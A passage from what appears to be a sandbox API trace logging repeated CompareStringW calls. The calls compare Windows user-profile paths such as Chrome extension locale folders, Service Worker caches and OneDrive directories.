Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount2=92) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\bn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\", cchCount1=140, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount2=139) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\gu\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount2=139) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount2=139) returned 3 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount2=139) returned 1 [0290.741] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount2=139) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount2=139) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\af\\", cchCount1=73, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount1=70, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\", cchCount2=70) returned 2 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\", cchCount1=72, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\Database\\", cchCount1=92, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\ScriptCache\\", cchCount2=95) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\fa\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\da\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\", cchCount1=131, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT\\", cchCount1=134, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", cchCount2=68) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\da\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount2=130) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ja\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount2=130) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\cs\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hy\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\lo\\", cchCount1=130, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\", cchCount1=132, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\pl\\", cchCount2=130) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\", cchCount2=118) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\", cchCount2=118) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00009376\\", cchCount1=89, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\", cchCount2=118) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\bf8f082f-6a47-47c8-a2cc-2761ce03ff32\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\", cchCount2=118) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Service Worker\\CacheStorage\\e6622492fa163609ddd4212f54512baa07929ed3\\1eb73b7c-1f7e-4d77-acd3-5605781472f5\\", cchCount1=174, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\IndexedDB\\https_www.google.de_0.indexeddb.leveldb\\", cchCount2=118) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ca\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\cast_setup\\", cchCount1=138, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 1 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\", cchCount1=139, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\", cchCount2=142) returned 3 [0290.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 